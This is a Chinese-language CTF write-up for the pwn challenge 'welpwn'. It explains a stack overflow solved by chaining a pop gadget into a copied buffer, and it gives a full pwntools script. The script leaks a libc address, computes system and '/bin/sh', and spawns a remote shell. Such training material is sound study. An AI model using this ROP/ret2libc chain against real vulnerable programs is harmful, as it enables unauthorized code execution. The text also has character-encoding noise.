[攻防世界 pwn]——welpwn

• 題目地址: https://adworld.xctf.org.cn/
• 題目:
  

我只能說這道題太巧了， 實在太巧了。我想出來一個名詞叫做棧連接

還是先checksec一下

然后在IDA中看看， buf無法溢出， s因為有循環(huán)判斷限定，只能溢出一個地址。

巧就巧在下面


0x20 = 32
這樣我們就可以輸入0x20個字符，也就是四個八個字節(jié)，四個pop掉就可以。

aaaaaaaa <--- s aaaaaaaa aaaaaaaa <--- echo ebp pop_4_addr <--- echo ret aaaaaaaa <--- buf aaaaaaaa aaaaaaaa pop_4_addr pop_rdi_addr write_got main_addr

執(zhí)行后變?yōu)? buf的前四個 八個字節(jié)都被pop掉了

pop_rdi_addr <--- ret write_got main_addr

同理，將棧這樣構(gòu)造。就可以獲得shell了

aaaaaaaa <--- s aaaaaaaa aaaaaaaa <--- echo ebp pop_4_addr <--- echo ret aaaaaaaa <--- buf aaaaaaaa aaaaaaaa pop_4_addr pop_rdi_addr bin_sh_addr system_addr

exploit

from pwn import * from LibcSearcher import * #p = process("./pwn") p = remote("111.200.241.244",49039) elf = ELF('./pwn') #gdb.attach(p, "b *0x0400782") write_got = elf.got['write'] puts_plt = elf.plt['puts'] pop_4 = 0x40089C pop_rdi = 0x4008A3 p.recvuntil('Welcome to RCTF\n') main_addr = 0x4007CD payload = 'a'*0x18 + p64(pop_4) + p64(pop_rdi) + p64(write_got) + p64(puts_plt) + p64(main_addr) p.send(payload) p.recvuntil('\x40') write_addr = u64(p.recv(6).ljust(8,'\x00')) print hex(write_addr) libc = LibcSearcher('write',write_addr) libc_base = write_addr - libc.dump('write') system_addr = libc_base + libc.dump('system') binsh_addr = libc_base + libc.dump('str_bin_sh') p.recvuntil('\n') payload = 'a'*0x18 + p64(pop_4) + p64(pop_rdi) + p64(binsh_addr) + p64(system_addr) p.send(payload) p.interactive()

總結(jié)

以上是生活随笔為你收集整理的[攻防世界 pwn]——welpwn的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。